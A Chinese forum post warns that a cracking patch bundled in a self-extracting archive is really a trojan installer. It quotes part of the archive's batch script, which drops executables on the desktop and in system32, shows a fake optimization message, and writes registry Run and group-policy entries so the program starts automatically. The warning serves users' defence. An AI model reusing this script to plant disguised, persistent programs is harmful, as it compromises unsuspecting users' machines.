新兵上阵
- 注册时间
- 2013-4-17
- 金币
- 12 个
- 威望
- 0 个
- 荣誉
- 0 个
尚未签到
|
压缩包里面的所谓PJ补丁其实是个种木马的过程,Winrar自动运行包中的程序很多杀不出来病毒或木马,但是看自动批处理命令就知道,在当前用户的桌面文件夹生成一个名为“hao123网址导航.exe”的程序,并且向c:\windows\system32\中拷贝一个名为“2.exe”的程序,通过注册表把Explorer进程的默认打开方式指向该程序。以下是该批处理命令的部分内容,稍微有点编程知识的都知道这是个注入木马的过程:
@echo off
copy hao123网址导航.exe %userprofile%\Desktop
copy hao123网址导航.exe "%userprofile%\桌面
cls
@echo.系统优化中,请稍后...
copy 2.exe c:\windows\system32\ /y
copy setting.ini c:\windows\system32\ /y
@echo off
reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer\Run" /v "1" /d "2.exe" /f
reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Group Policy Objects\{433D759F-6272-407A-AE31-A10723D6AD87}Machine\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run" /v "**delvals." /d " " /f
reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Group Policy Objects\{433D759F-6272-407A-AE31-A10723D6AD87}Machine\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run" /v "1" /d "2.exe" /f |
|